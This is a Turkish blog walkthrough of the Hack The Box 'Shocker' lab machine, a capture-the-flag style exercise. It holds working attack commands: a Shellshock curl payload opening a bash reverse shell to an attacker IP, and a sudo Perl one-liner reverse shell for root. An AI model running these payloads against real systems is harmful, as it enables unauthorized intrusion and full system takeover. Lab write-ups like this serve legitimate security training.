Pazar , 25 Ekim 2020
hackthebox shocker
hackthebox shocker

Hack The Box – Shocker

Full Port Tarama

Hack the Box Shocker makinesi üzerinde ilk olarak full port taraması yapılır.

nmap -p- — open -vvv -oN fullportscan 10.10.10.56
Hack The Box - Shocker 1 – image
nmap scan

Full port tarama sonrası açık olduğu tespit edilen portlar aşağıdadır.

80/tcp
2222/tcp

Versiyon Tarama

Tespit edilen portlar üzerindeki servisleri tespit etmek için versiyon taraması yapılır.

nmap -p 80, 2222 -sV -sC -vvv -oN versionscan 10.10.10.56
Hack The Box - Shocker 2 – image 2
nmap scan

Bilgi Toplama

Açık olarak olarak tespit edilen 80 HTTP portu tarayıcı üzerinden kontrol edildiğinde aşağıdaki ekran görüntüsü gelmektedir.

Hack The Box - Shocker 3 – image 4

Sayfa kaynağı incelenir.

Hack The Box - Shocker 4 – image 1
Sayfa Kaynağı

Hack the Box Shocker makinesi üzerinde “nikto” aracı ile zafiyet taraması yapılır.

nikto — host=http://10.10.10.56/
Hack The Box - Shocker 5 – image 5
nikto

Tarama işlemi sonrası bir şey bulunamadı. Ardından “dirb” aracı ile dizin taraması yapılır.

dirb http://10.10.10.56/
Hack The Box - Shocker 6 – image 3

Tespit edilen dizinler arasında “/cgi-bin” dizini dikkat çekmektedir. Çünkü bu dizin için daha önceden yayınlanmış bir zafiyet olduğundan bu dizin altında tarama işlemleri yapılır. CGI (Common Gateway Interface) web sunucuları için uygulamaların konsol gibi çalıştırılmasını sağlayan bir standarttır ve CGI scriptleri denir , “/cgi-bin” dizini altında yer alırlar.

dirb” ile daha kapsamlı bir dizin tarama işlemi için belirlenen wordlist ile “/cgi-bin/” dizini altında tarama yapılır.

dirb http://10.10.10.56/cgi-bin/ -x /usr/share/wordlists/dirb/extension-common.txt
Hack The Box - Shocker 7 – image 6
cgi-bin

Taramada “user.sh” dosyası bulunmuş olup içeriği kontrol edilir.

Hack The Box - Shocker 8 – image 7
user.sh

Dosyanın içeriğinde bash’te çalışan bir script görünmektedir. Sonrasında “/cgi-bin/” dizini ve altındaki dosyanın tespitiyle uygulama üzerinde “Shellshock” zafiyeti olma ihtimali vardır.Bu zafiyet için Metasploit’te bir exploit modül bulunmaktadır.

Zafiyetin İstismarı

Hedef sistemden reverse shell almak için aşağıdaki komut kullanılabilir.

curl -H ‘User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.10.14.20/7070 0>&1’ http://10.10.10.56/cgi-bin/user.sh

Ayrıca listening başlatılır.

nc -lvp 7070
Hack The Box - Shocker 9 – image 8

Üstteki ekran görüntüsünde görüleceği üzere hedef sistemde “shellshock” zafiyeti var ve zafiyet istismar edilerek reverse shell sağlandı.

Hedef sistem üzerinde session açtıktan sonra “user.txt” dosyasının içeriği okunur.

Hack The Box - Shocker 10 – image 8

Exploit-DB

Exploit;

python shellshock.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.20 lport=7070 pages=/cgi-bin/user.sh

Metasploit Modülü

exploit/multi/http/apache_mod_cgi_bash_env_exec

Yetki Yükseltme

Gelinen noktada sistem üzerindeki yetkileri yükseltmek için “sudo” yetkileri kontrol edilir.

sudo -l
Hack The Box - Shocker 11 – image 9
sudo

“/usr/bin/perl” uygulamasının parola gerektirmeden “root” yetkileriyle çalıştırılabileceği görünmektedir.

Aşağıdaki komut ile “/usr/bin/perl” çalıştırılarak hedef üzerinde “root” yetkileriyle oturum açılır.

sudo perl -e ‘use Socket;$i=”10.10.14.20";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
Hack The Box - Shocker 12 – image 10

Yetki yükseltmesi sonrası “root.txt” içeriği okunur.

Hack The Box - Shocker 13 – image 11

Bir cevap yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir